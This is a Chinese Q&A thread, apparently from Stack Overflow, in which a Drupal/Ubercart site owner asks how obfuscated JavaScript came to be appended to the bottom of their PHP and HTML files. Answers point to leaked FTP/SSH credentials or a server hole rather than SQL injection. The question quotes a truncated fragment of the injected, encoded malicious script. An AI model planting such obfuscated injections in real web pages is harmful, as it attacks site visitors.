1

我发现我的网页(主要是 index.php、main.html、include.inc)在我的原始代码之后的最底部被注入了一大块 javascript 代码。

<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"

SQL注入是否有可能将js代码块添加到网页中(比如其中50个被感染)?还是服务器本身的病毒?

我正在使用 Drupal + Ubercart,表单输入非常少。

4

2 回答 2

1

由于文件已被修改,因此不太可能是 SQL 注入。要么是服务器某处存在其他安全漏洞,要么是 ftp/ssh/etc 帐户的凭据泄露。

于 2010-04-16T15:10:50.693 回答
0

什么平台,浏览器?

您是在所有网页上看到它还是只在特定服务器上看到它?

一些“安全防火墙”将 Javascript 添加到传入页面。

于 2010-04-16T04:39:26.590 回答